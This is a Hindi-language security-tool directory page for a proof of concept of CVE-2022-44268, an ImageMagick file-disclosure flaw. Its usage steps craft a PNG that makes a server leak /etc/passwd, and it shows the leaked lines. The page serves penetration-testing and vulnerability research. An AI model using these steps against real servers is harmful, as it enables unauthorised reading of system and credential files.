Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
imagemagick-lfi-poc — ImageMagick LFI PoC [CVE-2022-44268] | Kitploit
उपकरण/GitHubGitHub/sybil-scan/imagemagick-lfi-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubsybil-scan/imagemagick-lfi-poc

imagemagick-lfi-poc

ImageMagick LFI PoC [CVE-2022-44268]

रिपॉजिटरी देखें
5392 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

ImageMagick LFI PoC [CVE-2022-44268]

शोधकर्ताओं ने MetabaseQ पर CVE-2022-44268 की खोज की, अर्थात ImageMagick 7.1.0-49 सूचना प्रकटीकरण के प्रति संवेदनशील है। जब यह एक PNG छवि को पार्स करता है (जैसे, आकार बदलने के लिए), तो परिणामी छवि में किसी मनमानी दूरस्थ फ़ाइल की सामग्री एम्बेड हो सकती है (यदि ImageMagick बाइनरी के पास इसे पढ़ने की अनुमति है)।

उपयोग

  • सुनिश्चित करें कि आपके पास ImageMagick और आवश्यक Python पैकेज स्थापित हैं।
root@kitploit:~
(~)>>> python3 generate.py -f "/etc/passwd" -o exploit.png

   [>] ImageMagick LFI PoC - by Sybil Scan Research <[email protected]>
   [>] Generating Blank PNG
   [>] Blank PNG generated
   [>] Placing Payload to read /etc/passwd
   [>] PoC PNG generated > exploit.png
  • उत्पन्न PNG फ़ाइल को कनवर्ट करें:
root@kitploit:~
(~)>>> convert exploit.png result.png
  • कनवर्ट की गई PNG फ़ाइल की सामग्री पढ़ें:
root@kitploit:~
(~)>>> identify -verbose result.png
  • Raw profile type फ़ील्ड में लौटाए गए डेटा को डीकोड करें, आप /etc/passwd की सामग्री देखेंगे:
टूल डाउनलोड करें
root@kitploit:~
(~)>>> python3 -c 'print(bytes.fromhex("726f6f743a783a726f6f743---REDACTED--").decode("utf-8"))'


root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin

संदर्भ

  • https://www.metabaseq.com/imagemagick-zero-days/
  • https://github.com/duc-nt/CVE-2022-44268-ImageMagick-Arbitrary-File-Read-PoC